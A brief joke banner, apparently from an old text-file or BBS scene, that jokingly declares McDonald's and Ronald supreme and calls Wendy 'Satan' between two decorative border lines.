ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ